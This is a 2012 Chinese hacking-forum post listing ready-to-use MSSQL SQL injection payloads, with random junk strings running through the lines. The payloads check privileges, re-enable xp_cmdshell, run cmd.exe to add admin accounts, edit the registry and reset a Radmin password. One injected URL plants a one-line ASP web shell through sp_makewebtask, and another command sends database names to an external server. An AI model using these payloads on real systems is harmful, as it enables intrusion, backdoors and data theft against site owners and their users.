找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2162|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的
3 D( {# M$ Z5 j4 {( K% x$ Q" Uand 1=(Select IS_MEMBER('db_owner'))
# a- t1 \0 j. a- H! HAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
2 W: Z4 n/ u, i2 G$ s: \% Q
4 @* u4 B% h( \& R3 S//检测是否有读取某数据库的权限0 K; T4 a: E; q2 Y
and 1= (Select HAS_DBACCESS('master'))
& B  y9 O. @) C6 m! `7 qAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --  |& A5 I& x0 W7 V; P
4 Q9 b* Q2 g: m- x2 e  @& N" ^+ p

& `' M6 M, M) U) V7 _8 G数字类型# c' _' {, [' \
and char(124)%2Buser%2Bchar(124)=02 W7 s6 C! t- |: u5 }' u3 C# |
$ Q" T! R6 @9 \  J+ b4 y' f9 H$ O/ Z
字符类型
4 s4 [1 \# j- o' and char(124)%2Buser%2Bchar(124)=0 and ''='
7 T, _* u( A( f* ]7 Y  V+ b2 E( w# N
: A) l% j& t6 w: P+ g7 X搜索类型
7 W# t6 K& H2 S* \. m% t6 v( r' and char(124)%2Buser%2Bchar(124)=0 and '%'='
  Q" Q# j' Z0 p8 f6 \" M" p! U  f" N/ y9 \# f9 _& \/ s5 c8 a* l% Z
爆用户名0 ^& h# X1 n" K# G5 h5 w
and user>0# }! ]' \+ K9 N: T, Y  ?& s: J
' and user>0 and ''='+ V* B4 B: V. f7 T8 \% j$ c

. P3 h2 T' d, M8 o# A, N检测是否为SA权限
8 o5 b) ?3 z( m$ X" z* ~and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
3 Z8 l8 f2 T" {% k+ g( ?And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --& i3 n) X7 `# c$ K
  U3 l) L7 _, S6 r7 O8 A% w
检测是不是MSSQL数据库5 I- B* }! l/ S
and exists (select * from sysobjects);--
' J: a, F0 P" C4 c! Z6 g2 {# a8 t( w1 P3 V, w0 o
检测是否支持多行
& u& c0 _2 i& V$ c/ j$ C4 T! o;declare @d int;--
7 R$ @7 W3 }! N( \  E5 y7 r: r  D% z5 K) t7 W2 Q& V7 |6 ?
恢复 xp_cmdshell
; ]# \: Y: l+ V;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
/ r; g$ B2 O8 B& R6 B, \$ a; P  B& H# M1 C7 E% a$ L
- N$ I2 a$ Y4 ]! h7 h
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
: A2 `+ [& a. B6 y6 e3 ^, Z, E" E4 ^1 J9 k6 i
//-----------------------
) q# y% ~6 R! J3 O//       执行命令* T( g+ D+ t6 O) G* ~, D) R
//-----------------------
2 A' A1 Z  \+ l6 x- V. p3 {6 N首先开启沙盘模式:
( R+ P0 b, b8 H% Gexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
7 ]+ k' G3 o% F, `- {6 r! k  R- l% O5 C$ N  B. j" i
然后利用jet.oledb执行系统命令
% f& v% z" G5 D, Q9 j- A+ Y; i2 Bselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
0 e! t4 b' c1 X) x1 |; k) W  N; U4 b' l4 N+ A6 `2 L
执行命令5 f) D  k. U4 K& A% b
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--! }) z8 _9 F1 N
' J, C: Q& I% @: m; S! J
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
- I+ d! K& e/ d$ u/ l2 q: E
5 [& S3 B8 ^( v7 k3 q! I" c判断xp_cmdshell扩展存储过程是否存在:8 u8 X) {+ a6 m+ O0 \$ R, s
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
' |$ t* @$ Y, u6 z5 B$ C0 I* V. j
写注册表# c8 C" Y; Q7 e6 v2 ~
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
- Q' {0 k% R( Y, m1 K8 U( C* ^1 T# L( C: R# c" D- i- f0 \
REG_SZ
0 N' C! I( O. j5 o: g+ Y# t9 A& s+ Y
读注册表0 x$ [  [2 R: a1 b4 H# s0 K
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
: I! W. T+ z, @
  b  G# c7 {$ I+ X0 \( `读取目录内容0 l- J4 g/ ^( C& c: A& C
exec master..xp_dirtree 'c:\winnt\system32\',1,1
' K& _5 {+ @! k4 a' W- i
. B2 i# u; B6 W# }7 K3 V+ j0 I! q$ a, B2 h# v* }2 V- ]$ }1 U. I
数据库备份6 i5 ]; J6 m! U3 \
backup database pubs to disk = 'c:\123.bak'3 H) e0 S4 q3 d' j) ]
9 `( j# C1 A$ ~: f- D% p
//爆出长度) v& `9 j6 ~$ C2 `( I, |5 t
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
! q" L) b2 r1 x: u/ L  F  t! M' |% a0 m+ S  M( E

8 A' s, ^; F( ?
) C7 u" l3 ]- Y/ m更改sa口令方法:用sql综合利用工具连接后,执行命令:+ y* T4 e0 p8 ?( U) x
exec sp_password NULL,'新密码','sa', W+ F4 ^" t; V+ Q7 J) E

, ^) t& K9 r6 R3 R* M添加和删除一个SA权限的用户test:
2 w5 x: g7 j0 }exec master.dbo.sp_addlogin test,9530772
! F1 ]+ e- r- H9 m( n3 V. c- X6 iexec master.dbo.sp_addsrvrolemember test,sysadmin
% I9 n1 x: \1 O9 `, m" W8 Q0 o# b2 I9 Q
删除扩展存储过过程xp_cmdshell的语句:, y& X6 c* o! v; ^" s5 f7 T
exec sp_dropextendedproc 'xp_cmdshell'
; e7 G! |$ v& r' K0 x: Y# z7 M' j1 l/ w- P0 W
添加扩展存储过过程
( P/ b( |1 R. f& P$ m6 EEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
6 u0 V" p6 X! A9 K+ n9 v% ZGRANT exec On xp_proxiedadata TO public
, h2 z6 G( s5 L& M! ^: j4 M! D% `$ o7 |+ i- X' Z5 c# \% r% D

; U1 Z8 a) u2 v  v% T/ }& m! Z停掉或激活某个服务。
0 ^! H) ~) b1 I4 u; j
0 X' Y' E: I, D* I- F6 Wexec master..xp_servicecontrol 'stop','schedule'5 ]' w* e6 p2 p" w
exec master..xp_servicecontrol 'start','schedule'
7 a. K. S7 ]3 [0 n9 I7 C' F% I/ U  R/ z' B
dbo.xp_subdirs
6 m1 `: v( {3 t# ^1 B1 D  ^# [; g( R; o& R, K, X( v& k
只列某个目录下的子目录。9 L. j+ G. q8 Q; M9 x
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
3 x- [1 q# A) R+ f4 ^3 W* q2 {4 t! A5 q0 w
dbo.xp_makecab
! Q% A7 x) S+ e  r, J: D$ X: a' p1 [4 z
将目标多个档案压缩到某个目标档案之内。/ _/ l, S1 M5 N7 x6 Z
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。! f1 s4 P/ t* Z

8 R+ m- w/ y8 S5 b: f3 Edbo.xp_makecab, n% D9 ?" c+ L( O; P, Z
'c:\test.cab','mszip',1,7 |* C, [9 v/ e1 Z2 f9 c
'C:\Inetpub\wwwroot\SQLInject\login.asp',
' b% i. p3 u+ W* {' x8 N& F'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'( \. c; l# ~) H
. n" L! }1 _7 ^$ h8 K4 F$ k
xp_terminate_process  S7 o1 Z8 G( Q; x8 ]

# P# ~1 c7 F: u: C停掉某个执行中的程序,但赋予的参数是 Process ID。* x) Q) v8 o7 i% D
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID8 {8 }6 ^; V% V
, j) Y4 \: @8 Z: R3 u
xp_terminate_process 2484
: L; t2 g* p  h
9 L- Y3 _- I. w, K5 mxp_unpackcab# z/ G  z/ N% z

( m( ^* t5 D- ^& [; E, `  e解开压缩档。
' I7 H# n. ~: ~/ M3 N! s2 j+ V2 G7 h% V! C! d2 v- ~9 U0 d7 q/ V2 c
xp_unpackcab 'c:\test.cab','c:\temp',1( H% G1 o, g+ i* n& x( b# G

0 F, u. q/ q- c( X9 c# j
/ Z  F3 x8 D) ?1 j! O某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
: P/ ^6 D2 y3 `- R  I$ F/ a: @. U
create database lcx;1 |- S( \! n/ ?# M6 N6 t
Create TABLE ku(name nvarchar(256) null);" d% i/ [8 S$ V/ ^- O
Create TABLE biao(id int NULL,name nvarchar(256) null);, d. I7 \3 P% }) l) N9 E

: q" S1 m3 i: C7 Y6 @//得到数据库名
- z" n2 o5 C+ _/ n! V) ^insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases0 |4 i% j7 H  ]1 r' m+ v- c

: o2 I/ M9 [" }; W* R& ?/ U6 z5 H4 `9 j  f
//在Master中创建表,看看权限怎样( f# V& I, v; G% @5 [. r
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--. A- `" j0 z( z5 j* ^
! |: M( z5 F. \6 h9 |' j  f  f
用 sp_makewebtask直接在web目录里写入一句话马:- P2 i- E7 J8 u- `, C3 Y  g
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
8 ?) a# x( ~3 _2 n
' S* G3 ^1 D6 v4 t" d7 X3 `& U//更新表内容( [- `7 J6 A( R- D* m6 F  H
Update films SET kind = 'Dramatic' Where id = 123
# m* Y8 p# L1 {' n, E
, R9 }/ E3 V: \$ l/ B0 M//删除内容
) u/ h' d) g1 s7 _delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表